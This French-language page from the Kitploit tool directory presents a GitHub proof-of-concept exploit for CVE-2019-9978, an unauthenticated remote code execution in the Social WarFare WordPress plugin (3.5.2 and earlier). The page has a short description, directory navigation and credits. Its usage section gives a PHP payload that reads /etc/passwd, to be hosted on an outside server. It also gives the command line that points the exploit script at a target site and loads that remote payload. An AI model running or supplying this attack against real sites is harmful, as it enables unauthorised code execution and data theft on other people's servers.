Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-9978 — CVE-2019-9978 - (PoC) RCE dans le plugin Social WarFare (<=3.5.2) | Kitploit
Outils/GitHubGitHub/hash3lizer/cve-2019-9978
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubhash3lizer/cve-2019-9978

CVE-2019-9978

CVE-2019-9978 - (PoC) RCE dans le plugin Social WarFare (<=3.5.2)

Voir le dépôt
228il y a 7 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-9978

CVE-2019-9978 - (PoC) RCE dans le plugin Social WarFare (<=3.5.2)

Description

Une exécution de code à distance non authentifiée a été découverte dans la fonctionnalité qui gère l'importation des paramètres. Un utilisateur peut exploiter l'utilisation de RFI pour réaliser une RCE.

PoC

Copiez la payload suivante :

root@kitploit:~
<pre>system('cat /etc/passwd')</pre>

Enregistrez-la avec le nom de fichier : payload.txt et téléchargez-la sur un serveur. L'URI devrait ressembler à : http(s)://yoursite.com/payload.txt. Enfin, fournissez vos options --target et --payload-uri :

root@kitploit:~
$ python cve-2019-9978.py --target http://vulntarget.com \
                         --payload-uri http://yourpayloadsite.com/payload.txt

Capture d'écran du 2019-05-03 à 11-15-02

Crédits

Chercheur : Luka Sikic
Lien : https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
Auteur : @hash3liZer

Télécharger l’outil